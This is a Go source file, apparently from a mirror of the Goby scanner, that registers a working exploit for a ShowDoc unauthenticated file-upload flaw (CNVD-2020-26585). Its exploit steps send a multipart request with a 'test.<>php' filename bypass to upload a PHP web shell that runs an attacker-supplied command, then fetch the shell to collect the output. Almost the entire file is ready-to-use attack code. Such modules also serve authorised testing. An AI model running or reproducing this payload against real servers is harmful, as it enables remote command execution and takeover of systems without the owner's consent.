mirror of https://github.com/qwqdanchun/Goby.git
225 lines
5.8 KiB
Go
225 lines
5.8 KiB
Go
package exploits
|
||
|
||
import (
|
||
"gopoc"
|
||
|
||
"git.gobies.org/goby/goscanner/goutils"
|
||
)
|
||
|
||
func init() {
|
||
expJson := `{
|
||
"Name": "Showdoc存在文件上传漏洞",
|
||
"Description": "Showdoc存在文件上传漏洞,攻击者可以利用漏洞获取服务器权限。",
|
||
"Product": "",
|
||
"Homepage": "",
|
||
"DisclosureDate": "2021-06-23",
|
||
"Author": "desktop-kf8vclk\\360\r\n",
|
||
"GobyQuery": "app=\"ShowDoc\"",
|
||
"Level": "3",
|
||
"Impact": "",
|
||
"Recommendation": "厂商暂未提供修复方案,请关注厂商网站及时更新:\n\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\thttps://www.showdoc.cc",
|
||
"References": [
|
||
"https://gobies.org/"
|
||
],
|
||
"RealReferences": [
|
||
"https://www.cnvd.org.cn/flaw/show/CNVD-2020-26585"
|
||
],
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "cmd",
|
||
"type": "input",
|
||
"value": "whoami"
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"data": "-----------------------------346031065719027724703329952952\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"1.<>php\"\nContent-Type: text/plain\n\n<?php echo \"921378126371623762173617\";?>\n-----------------------------346031065719027724703329952952--",
|
||
"data_type": "text",
|
||
"follow_redirect": true,
|
||
"method": "POST",
|
||
"uri": "/index.php?s=/home/page/uploadImg",
|
||
"header": {
|
||
"Content-Type": "multipart/form-data; boundary=---------------------------346031065719027724703329952952"
|
||
}
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": ",\"success\":1}",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "\\/Public\\/Uploads\\/",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"date|lastbody|regex|.*Uploads\\\\\\/(.*?)\\\\\\/.*",
|
||
"file|lastbody|regex|.*Uploads\\\\\\/.*\\\\\\/(.*?)\\\""
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/Public/Uploads/{{{date}}}/{{{file}}}",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "921378126371623762173617",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/index.php?s=/home/page/uploadImg",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
|
||
"Content-Length": "239",
|
||
"Content-Type": "multipart/form-data; boundary=--------------------------921378126371623762173617",
|
||
"Accept-Encoding": "gzip"
|
||
},
|
||
"data_type": "text",
|
||
"data": "----------------------------921378126371623762173617\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"test.<>php\"\nContent-Type: text/plain\n\n<?php system(\"{{{cmd}}}\");unlink(__FILE__);?>\n----------------------------921378126371623762173617--"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "success",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "Public",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "Uploads",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"date|lastbody|regex|.*Uploads\\\\\\/(.*?)\\\\\\/.*",
|
||
"file|lastbody|regex|.*Uploads\\\\\\/.*\\\\\\/(.*?)\\\"",
|
||
"output|lastbody"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/Public/Uploads/{{{date}}}/{{{file}}}",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody"
|
||
]
|
||
}
|
||
],
|
||
"Tags": null,
|
||
"CVEIDs": null,
|
||
"CVSSScore": "",
|
||
"CNVDIDs": [
|
||
"CNVD-2020-26585"
|
||
],
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
},
|
||
"Disable": false,
|
||
"Recommandation": ""
|
||
}`
|
||
|
||
gopoc.ExpManager.AddExploit(gopoc.NewExploit(
|
||
goutils.GetFileName(),
|
||
expJson,
|
||
nil,
|
||
nil,
|
||
))
|
||
}
|
||
|
||
// generate by genpoc: goby-cmd -mode genpoc -CNVDID CNVD-2020-26585 -exportFile exploits\user\CNVD-export.go
|